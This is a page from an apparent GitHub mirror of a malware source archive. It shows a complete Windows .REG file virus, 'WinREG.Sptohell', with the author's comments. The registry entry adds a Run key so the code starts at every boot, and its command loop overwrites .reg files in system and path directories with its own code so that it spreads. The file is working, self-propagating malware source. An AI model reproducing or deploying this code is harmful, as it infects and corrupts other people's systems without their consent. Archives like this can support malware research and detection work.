13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/Win32/Virus.WinREG.Sptohell.b
2020-10-10 22:07:43 -05:00

14 lines
857 B
Brainfuck

REGEDIT 4
;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- ***************
;;
;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
;;
;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
;; itself (the code in the registry) to these .REG-files.
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"